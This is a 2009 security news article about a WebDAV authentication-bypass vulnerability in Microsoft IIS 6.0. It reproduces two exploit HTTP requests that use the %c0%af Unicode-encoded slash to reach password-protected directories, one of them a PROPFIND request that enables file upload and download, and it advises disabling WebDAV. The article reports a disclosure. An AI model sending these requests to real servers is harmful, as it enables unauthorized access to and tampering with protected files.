In association with heise online

16 May 2009, 14:28

Security hole in IIS 6.0

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

A WebDAV vulnerability in Microsoft's Internet Information Server 6.0 (IIS) allows attackers to access password-protected directories and download and even upload arbitrary files. According to a report, the access isn't limited to WebDAV folders: the vulnerability affects all the directories controlled by the web server. It is caused by a flaw in the processing of unicode characters.

Nicolaos Rangos, who discovered the hole, reports that a request with a header like the following example, prompts the IIS to return a protected file from a regular folder without any authentication:

GET /..%c0%af/protected/ HTTP/1.1
Translate: f
Connection: close
Host: servername

In this example, the slash "/" is encoded as the %c0%af unicode character; the security function apparently overlooks this and consequently grants access to /protected/ The Translate: f option activates the WebDAV function for regular directories. It is, however, not possible to download ASP scripts this way, unless the server has explicitly been enabled to return source code.

According to Rangos, an attack on the WebDAV folder is slightly more complex, but does enable the attacker to upload as well as download:

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns=""/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>

WebDAV is not enabled by default. Those who have activated it should disable it, or deny remote accesses from the internet until further information and a solution to this problem have become available.

A similar hole in IIS was discovered in IIS 4 and 5 in 2000. The security expert Thierry Zoller has compared the old hole and this new hole in his blog.

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit